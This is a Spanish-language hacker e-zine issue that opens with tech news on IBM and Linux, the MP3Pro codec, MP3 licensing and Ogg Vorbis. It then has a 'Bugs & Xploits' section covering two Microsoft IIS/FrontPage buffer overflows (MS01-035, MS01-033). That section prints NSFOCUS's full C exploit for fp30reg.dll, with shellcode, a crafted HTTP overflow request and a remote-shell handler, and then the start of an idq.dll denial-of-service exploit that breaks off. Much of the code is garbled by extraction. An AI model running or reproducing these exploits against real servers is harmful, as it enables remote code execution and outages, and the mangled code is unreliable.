Caldera, SuSE, Turbolinux), y que se esta tomando en serio el asunto, lo que promete ser muy beneficioso para el futuro desarrollo y expansion de este sistema operativo. Para los que desconfian de grandes corporaciones entrometiendose en sistemas libres, o para los que quieren ver algunos de los adelantos tecnologicos que IBM ha echo sobre este tema, visiten la pagina sobre linux de IBM: www.ibm.com/linux .MP3Pro, el proximo estandar de la musica para Internet? En medio de la polemica levantada por el caso Napster, Thomson Multimedia busca revolucionar de nuevo el mercado con el lanzamiento del formato MP3Pro.

Un nuevo algoritmo de codificacion (codec) que proporcionara un rendimiento de 128 Kbps ocupando el mismo tama~o que un archivo codificado a la mitad, a 64 Kbps. Mayor calidad a menor espacio, y, segun han adelantado fuentes de la compa~ia, sin mecanismos anticopia. Sera este el futuro de la musica en Internet?. Viernes, 9 marzo 2001 DAVID YAGE, iBrujula.com Thomson Multimedia ultima el lanzamiento de lo que puede convertirse en el nuevo estandar musical en la Red. El MP3Pro, desarrollado por Coding Technologies, una empresa con filiales en Suecia y Alemania, y un grupo de trabajo que se desprendio del Fraunhofer Institute, el nuevo codec ofrece una calidad sobresaliente usando la mitad de espacio que su predecesor, el famoso MP3. Por otra parte, MP3Pro sera totalmente compatible tanto con los antiguos formatos, como con los reproductores de audio. Asi, los archivos codificados en MP3 podran ejecutarse en cualquier reproductor de MP3Pro. Thomson ha adelantado que el nuevo codec sera implementado en los entornos Windows 98 y ME y en los sistemas Mac y Linux y se espera que a principios del proximo mes de abril el formato ya este listo para su lanzamiento. Un poco de historia: Para encontrar el origen del formato MP3 hace falta remontarse veinte a~os atras, cuando los ingenieros de la Universidad de Erlangen-Nuremberg (Alemania) trabajaban en un algoritmo capaz de transmitir musica a traves de la linea telefonica. Poco se imaginaban entonces que su trabajo se convertiria en una autentica revolucion social. Sus estudios fueron retomados en 1987 por el Instituto Fraunhofer para circuitos integrados (IIS). Los ingenieros de este comenzaron a trabajar en la compresion de audio en el marco del proyecto EU 147 de EUREKA. Junto con la Universidad Erlangen (Alemania) y el profesor Dieter Seitzer, finalmente lograron un algoritmo que fue estandarizado bajo el nombre ISO-MPEG Audio Layer III, el famoso MP3. En Mayo de 1988 se reunio por primera vez el Moving Pictures Expert Group (MPEG), una asociacion que pretendia unificar criterios para la creacion de nuevos formatos multimedia. Mediante la fijacion de una serie de estandares, la asociacion MPEG admitio distintos formatos de compresion para ser revisados. Compresion 12:1. Como se consiguio el milagro? La hipotesis que usaron los investigadores para el desarrollo del algoritmo de codificacion es que el oido humano no es capaz de escuchar todos los sonidos que son emitidos. Por tanto, el metodo de codificacion permitia determinar y eliminar aquellos sonidos que no llegarian a ser reconocidos por el oido humano y se podria lograr una compresion mayor. De este modo, eliminando aquellas frecuencias que no son percibidas por el usuario final se llego a establecer el concepto conocido como "Perceptual Audio Coding" (Codificacion perceptual de audio). Un nuevo sistema que permitio a los ingenieros del Instituto Fraunhofer llegar a comprimir los archivos de sonido bajo 'ratios' nunca vistos hasta aquel momento. Un segundo de musica, con calidad de CD, ocupa 176.400 bytes en un CD de audio, o bajo un archivo de extension WAV (sin comprimir). Asi, una cancion de cuatro minutos tendra un tama~o de 42.336.000 bytes. Sin embargo, esta misma cancion comprimida con el formato MP3 ocupa, aproximadamente, 3.500.000 bytes, unas 12 veces menos. Lo que permite, en teoria grabar doce CDs de musica en uno solo si se graba en formato MP3. El negocio de la musica La inclusion del formato MP3 como estandar para la grabacion y distribucion de musica supuso una verdadera revolucion para los usuarios informaticos. En este sentido, su combinacion con Internet levanto ampollas en el sector discografico. Las principales compa~ias observaban preocupadas como circulaban miles y miles de canciones por la Red sin recibir ninguna remuneracion a cambio. Actualmente, segun datos de la RIAA, el organismo encargado de proteger los derechos de autor de la musica por Internet, se descargan alrededor de 1.000 millones de canciones en formato MP3 mensualmente, lo que redunda en una importante perdida de ingresos para la

industria discografica, que ha visto seriamente mermados sus ingresos desde la aparicion del famoso formato. Si alguien se pregunta el porque de tanta polemica en torno a este estandar, solo hace falta tener en cuenta dos datos. En primer lugar el negocio discografico mueve, solo en Estados Unidos, 40.000 millones de dolares. Asi pues, hay mucho dinero en juego de las grandes compa~ias discograficas. Y estas no estan dispuestas a regalar ni un centavo a los consumidores. En segundo lugar, segun los buscadores estandares de Internet, MP3 es la segunda palabra mas buscada detras de "sexo". No resulta extra~o entonces, que sitios como mp3.com, mp3.org o el mas famoso caso Napster hayan acaparado la atencion del sector discografico. El pago de derechos, cuotas mensuales o, en los casos mas extremos, la decision judicial de cese de actividades han sido las medidas mas comunes, aunque, dada la falta de regulacion de la que adolece el mundo de la Red, aun es pronto para hablar del sistema que se usara en un futuro proximo. Aunque no todos han perdido con el MP3, Thomson Multimedia, actual propietaria de los derechos de explotacion del formato, junto con el Instituto Fraunhofer, recibe un 1% del precio de venta de cada archivo MP3, con un minimo de 15.000 dolares. Mientras que las compa~ias que venden hardware MP3 han de pagar 50 centavos por unidad con el mismo minimo de 15.000 dolares. No obstante los que peor lo tienen son las compa~ias que realizan compresores ya que han de pagar 5 dolares por unidad. Unos ingresos que pretende aumentar, cobrando unas tasas anuales a las numerosas emisoras de radio 'online' que han aparecido durante los ultimos a~os. Ogg Vorbis: la alternativa libre Al igual que en el sector de los sistemas operativos, el sistema de codigo abierto tambien llega al sector de la musica, con la filosofia de ser un sistema libre, gratuito y al alcance de toda la comunidad multimedia. El sistema es totalmente abierto, ello significa que, a diferencia del MP3, su empleo y comercializacion es totalmente libre, no existiendo ningun tipo de cargos sobre su uso y distribucion. Concretamente, Ogg Vorbis es un formato de audio comprimido de alta calidad, nacido del proyecto Xiphophorus, que admite hasta 255 canales de audio independientes, lo cual lo situa al mismo nivel alcanzado por el popular MP3. El unico inconveniente de este formato es que no admite la compresion a baja calidad, quedando limitado a un ratio de entre 128 y 160 Kbps, en el que, segun las primeras pruebas es superior al MP3. Sin embargo, a pesar de su avanzado estado de desarrollo, los algoritmos de este nuevo formato estan aun en fase de evaluacion, 'Request For Comments' (Peticion de Comentarios), de manera que las especificaciones finales todavia no se han establecido. Tomado de: http://mcd.imbecil.com/sections.php?op=printpage&artid=9 .La revolucion del formato Vorbis .Ogg Que es Vorbis Ogg? Como todos vosotros sabeis la mayor parte del formato MP3 fue desarrollado por el Instituto Fraunhofer Aleman. Lo que no todo el mundo sabe es que dicha tecnologia, a diferencia de la creencia general, no es libre. De hecho el Instituto Fraunhofer ha licenciado sus derechos sobre el formato MP3 a Thomsom Multimedia que actualmente esta obteniendo considerables ingresos por el.

Las compa~ias que venden MP3 han de pagar un 1% del precio de venta de cada MP3, con un minimo de 15.000 dolares. Las que venden hardware MP3 han de pagar 50 centavos por unidad con el mismo minimo de 15.000 dolares. No obstante los que lo tienen peor son las compa~ias que realizan compresores ya que han de pagar 5 dolares por unidad. Ademas en la pagina web de Thomsom se especifica claramente que las previsiones de la compa~ia pasan por empezar a cobrar a finales de a~o a las empresas que usen el formato MP3 para emitir radio desde Internet. A partir de entonces Thomson empezara a cobrar un minimo anual y un porcentaje. Esto ha significado un importante traspies para Musicmatch y ha paralizado muchos de los proyectos de compresores libres. Algunos de los mas conocidos (Bladeenc, Lame, etc...) han comenzado a publicar sus fuentes para que sea el propio usuario el que compile el programa y evitar con esta treta tener que pagar los derechosa Thomson. En vista de lo cual y ante las malas expectativas que se avecinan se ha desarrollado el formato Ogg Vorbis. Inicialmente ya se han desarrollado varios plugins para los reproductores mas conocidos del mercado. **Caracteristicas tecnicas del Ogg Vorbis. Ogg Vorbis es un formato de audio comprimido de alta calidad y proposito general (44.1-48.0kHz, 16+ bit y polifonico, pues admite hasta 255 canales de audio independientes), lo cual situa a Vorbis en la misma categoria que que MPEG-1 audio layer 3, MPEG-4 audio (AAC y TwinVQ), y PAC. De hecho podemos hablar de Ogg Vorbis como un compresor MPEG-4, que esta intentando ponerse a la cabeza del resto de competidores que existen en este formato, en concreto hablamos de AAC and TwinVQ. Actualmente el formato no admite la compresion a bajos bitrates, no obstante los desarrolladores nos han confirmado que el algoritmo ya esta sobre el papel y que muy pronto esta caracteristica estara disponible para los archivos ogg. Los ficheros con formato Ogg Vorbis poseen la extension "ogg" y son solo el comienzo de una familia de productos multimedia que OggSquish esta desarrollando como parte del proyecto Xiphophorus. A pesar de su avanzado estado de desarrollo, los algoritmos de este nuevo formato estan aun en fase de 'Request For Comments' (Peticion de Comentarios), de manera que cualquier tipo de sugerencia o aportacion por parte de la comunidad multimedia sera bienvenida antes de cerrar las especificaciones finales. Ogg vs. Mp3 Las pruebas que hemos realizado con varios archivos ogg nos demuestran que la potencia necesaria para codificar y decodificar en este formato, es similar a la necesaria para hacerlo bajo MP3. No obstante hemos de tener en cuenta que los algoritmos de compresion y descompresion estan aun en sus primeras fases por lo que una vez que sean optimizados podemos aseguraros que sera bastante mas rapido que el MP3. De todas formas Vorbis aun no esta lo suficientemente maduro como para ser comparado seriamente, no obstante parece ser que a ratios de 128-160 kbps produce codigo mas optimizado que MP3.

Aspectos Legales. Ademas el sistema es totalmente abierto, ello significa que a diferencia del MP3 su empleo y comercializacion es totalmente libre, no existiendo ningun tipo de cargos sobre su uso y distribucion. Otro aspecto que no podemos dejar de lado es la presion que la RIAA y otras asociaciones estan ejerciendo sobre las especificaciones de los nuevos formatos de audio MP4, de manera que el control sobre los contenidos en los nuevos formatos va a ser total. Fases de Codificacion/Descodificacion del Formato Ogg Fases de Codificacion en el formato Ogg Stream Analisis. Un programa que codifique en formato Vorbis toma un peque~o segmento de datos de audio, analiza el contenido y determina la representacion compacta mas optima. Codificacion. Para cada bloque de sonido el encoder empaqueta la se~al en bruto de manera que el tama~o es mucho mas peque~o que el original. Streaming. A continuacion los paquetes en bruto son reestructurados en una cadena continua de octetos. Fases de Decodificacion en el formato Ogg Stream: Descomposicion del Flujo. El decodificador ejecuta el proceso inverso al anterior, extrayendo la secuencia inicial a partir del bloque de paquetes. Decodificacion. Ahora se reconstruye la representacion de la se~al a partir de los paquetes en bruto. Sintesis. Finalmente se reconstruye la se~al de audio original a partir desde la se~al decodificada. Mas informacion en http://www.vorbis.org Esto fue tomado de la FAQ sobre Vorbis de Hispamp3.com :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 15. Bugs & Xploits ::--.. by Taker & teespy Largo tiempo desde el ultimo articulo decente que hablo de bugs... A veces se pone uno a filosofar y viene el dilema, hacer facil la vida a los Kiddies o Informar a la gente... he ahi el dilema... :| Bien, este no tan excelente viene a dar inicio a lo que puede llamarse nuevamente la seccion de Bugs, vamos a tratar de mantenerla al dia, por ahora vamos con un par de bugs de Microsoft y otro par de unos *nix [thanx Tee ;) ] Sorry por lo cortico. :(

***************************************************************************** Vendor: Microsoft Vulnerabilidad: Subcomponente RAD Extensiones de Frontpage Parches: Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727 ----------------------------------------------------------------------------Microsoft en su boletin MS01-035 ha emitido una alerta de seguridad advirtiendo a sus usuarios de la vulnerabilidad detectada en un subcomponente de las Extensiones FrontPage, en este caso el subcomponente es el Visual Studio RAD (Remote Application Deployment). Este se utiliza para hacer desarrollos de sitios Web y aplicaciones orientadas a la Web por medio de InterDev. Este subcomponente se encuentra afectado por una vulnerabilidad de desbordamiento de bufer, asi un usuario malicioso podria enviar paquetes creados especialmente para tratar de ejecutar codigo malicioso en el servidor. Microsoft tambien ha anunciado que el impacto puede no ser muy alto, ya que este subcomponente no se instala por defecto (ni con las Extensiones de Frontpage, ni con el IIS 4.0 ni con el IIS 5.0), y que al ser seleccionado especificamente para su instalacion, se activa un mensaje alertando que este solo debe ser instalado en equipos para desarrollo y nunca en equipos que esten conectados a Internet. Exploit: /* * * * * * * * * * * */ fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug. Copyright (c) 2001 - Nsfocus.com DISCLAIMS: This is a proof of concept code. This code is for test purpose only and should not be run against any host without permission from the system administrator. NSFOCUS Security Team <security@nsfocus.com> http://www.nsfocus.com <stdio.h> <sys/time.h> <sys/types.h> <netinet/in.h> <netdb.h> <signal.h> <unistd.h> <errno.h>

#include #include #include #include #include #include #include #include

/* fat shellcode ;) */ char shellcode[] = "\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34" "\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46" "\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12"

5"

"\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2" "\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa" "\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55" "\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce" "\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d" "\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d" "\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17" "\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b" "\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa" "\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55" "\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27" "\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba" "\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21" "\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23" "\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55" "\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa "\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5" "\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f" "\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55" "\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6 "\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d "\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27" "\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b" "\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa "\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa" "\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55" "\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d" "\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6" "\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55 "\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2 "\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5 "\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55" "\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa" "\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f" "\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x2 "\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16" "\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e" "\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41" "\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16" "\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8" "\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23" "\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa" "\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa" "\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55" "\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55" "\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f" "\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f" "\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36" "\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x5

b" "

8"

" f" d"

3"

5"

"

"\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55" "\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55" "\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f" "\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55" "\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27" "\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55" "\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e" "\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb" "\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9" "\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0" "\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55" "\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d" "\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27" "\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29" "\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8" "\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55" "\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55" "\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55" "\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6 "\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21" "\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55" "\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa" "\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e" "\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55" "\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d" "\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54" "\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e" "\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a" "\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde" "\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce" "\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf" "\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6" "\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde" "\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa";

int resolv (char *host, long *ip) { struct hostent *hp; if ((*ip = inet_addr (host))<0) { if ((hp = gethostbyname (host)) == NULL) { fprintf (stderr, "%s: unknown host\n", host); exit (-1); } *ip = *(unsigned long *) hp->h_addr;

} return 0;

int connect_to (char *hostname, short port) {

struct sockaddr_in sa; int s; s = socket (AF_INET, SOCK_STREAM, 0); resolv (hostname, (long *) &sa.sin_addr.s_addr); sa.sin_family = AF_INET; sa.sin_port = htons (port); if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1) { perror("connect"); exit(-1); } } return s;

void runshell (int sockd) { char buff[1024]; int ret; fd_set fds; printf("\nPress CTRL_C to exit the shell!\n"); for (;;) { FD_ZERO (&fds); FD_SET (0, &fds); FD_SET (sockd, &fds); if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0) { exit (-1); } if (FD_ISSET (sockd, &fds)) { bzero (buff, sizeof buff); if ((ret=read(sockd,buff,sizeof(buff)))<1) { fprintf (stderr, "Connection closed\n"); exit (-1); } write(1,buff,ret); } if (FD_ISSET (0, &fds)) { bzero (buff, sizeof buff); ret=read(0,buff,sizeof(buff)); write(sockd,buff,ret); }

main (int argc, char **argv) { char overbuff[400]; char buff[4096]; /* If system has the unicode bug, it is possible to attack fp4areg.dll */ /* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */ char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll"; char server[] = "www.blahblah.com"; char retaddress[] = "\x62\x18\xd5\x67"; char jmpshell[] = "\xff\x66\x78"; int i, sockfd; int port = 80; if (argc < 2) { printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Sec urity Team\n\n"); printf ("Usage: %s victim [port]\n", argv[0]); exit (-1); } if (argc > 2) port = atoi (argv[2]); sockfd = connect_to (argv[1], port); bzero (overbuff, sizeof (overbuff)); bzero (buff, sizeof (buff)); memset (overbuff, 'a', 258); memcpy (overbuff, jmpshell, strlen (jmpshell)); strcpy (overbuff + 258, "%c"); for (i = 0; i < 0x50; i += 4) strncat (overbuff, retaddress, 4); strcat (overbuff, "aaa"); sprintf (buff, "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \ text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s", fppath, overbuff, server, strlen (shellcode), shellcode); printf ("buff len = %d\n", strlen (buff)); write (sockfd, buff, strlen (buff)); printf ("payload sent!\n"); if(read (sockfd, buff, strlen(buff))<0) { printf("EOF\n"); exit(-1); } else { if(memcmp(buff,"XORDATA",8)==0) { printf("exploit succeed\n"); /* Press Enter key to get the command prompt */ runshell (sockfd); } else {

} }

printf("exploit failed\n"); close(sockfd); exit(-1);

***************************************************************************** Vendor: Microsoft Vulnerabilidad: Extensiones ISAPI en IIS Parches: Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 ----------------------------------------------------------------------------Microsoft ha advertido sobre una grave vulnerabilidad (boletin MS01-033 que afecta a Internet Information Service (todas las versiones) bajo Windows NT 4.0 o Windows 2000. Se recomienda a todos los administradores de sistemas la instalacion del correspondiente parche. La vulnerabilidad esta dada por un desbordamiento de bufer, que podria permitir la ejecucion de codigo arbitrario en el equipo afectado. Esta falla se encuentra en una porcion de codigo de la extension ISAPI idq.dll que esta relacionada con las funcionalidades de Microsoft Indexing Service. Si se hace una solicitud creada especialmente, seria posibe colgar los servicios web y segun la version del IIS, incluso a reiniciar el servidor. Y si la solicitud es especialmente construida, se podria llegar a tomar control completo del servidor web con sus consiguientes efectos. Una forma manual para protegerse contra esta vulnerabilidad, es la de siempre, deshabilitar el mapeo de los archivos *.idq y *.ida, pero lo mejor como siempre es bajar e instalar el parche. Exploit // DoS for isapi idq.dll unchecked buffer. // For Testing Pruposes // By Ps0 DtMF dot com dot ar #include #include #include #include #include #include #include <stdio.h> <sys/socket.h> <sys/types.h> <netinet/in.h> <arpa/inet.h> <netdb.h> <errno.h>

// #define DEBUG int main(int argc, char *argv[]) { char mensaje[800]; char *bof;

